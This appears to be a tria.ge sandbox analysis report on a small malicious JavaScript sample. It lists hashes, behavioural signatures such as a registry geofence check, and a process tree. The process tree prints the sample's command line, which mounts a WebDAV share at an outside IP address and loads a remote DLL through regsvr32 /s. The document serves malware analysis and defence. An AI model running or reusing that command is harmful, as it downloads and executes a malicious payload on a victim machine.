Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23/07/2024, 02:03
Static task
static1
Behavioral task
behavioral1
Sample
4ca5ffa9a6a1cf527e027693d7b7b9c9f0aadde0db80665ceb42f395a800fabb.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
4ca5ffa9a6a1cf527e027693d7b7b9c9f0aadde0db80665ceb42f395a800fabb.js
Resource
win10v2004-20240709-en
General
-
Target
4ca5ffa9a6a1cf527e027693d7b7b9c9f0aadde0db80665ceb42f395a800fabb.js
-
Size
3KB
-
MD5
ddd8c6180a09e4f9337efa434ccbcbcd
-
SHA1
ebd0961e8b94ad71160c600e0ae663d015b01574
-
SHA256
4ca5ffa9a6a1cf527e027693d7b7b9c9f0aadde0db80665ceb42f395a800fabb
-
SHA512
f03857fa0d1e0f1c5a4f160bfc1a23023994a453eeb2b2d1ab7eb1951c210ab7b0e1bc2ed3531c8a4d560911869a8e03aa4debdef0302c0513e8df57e0ad517f
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 212 wrote to memory of 3604 212 wscript.exe 84 PID 212 wrote to memory of 3604 212 wscript.exe 84 PID 3604 wrote to memory of 1048 3604 cmd.exe 86 PID 3604 wrote to memory of 1048 3604 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\4ca5ffa9a6a1cf527e027693d7b7b9c9f0aadde0db80665ceb42f395a800fabb.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\92451529317231.dll2⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:1048
-
-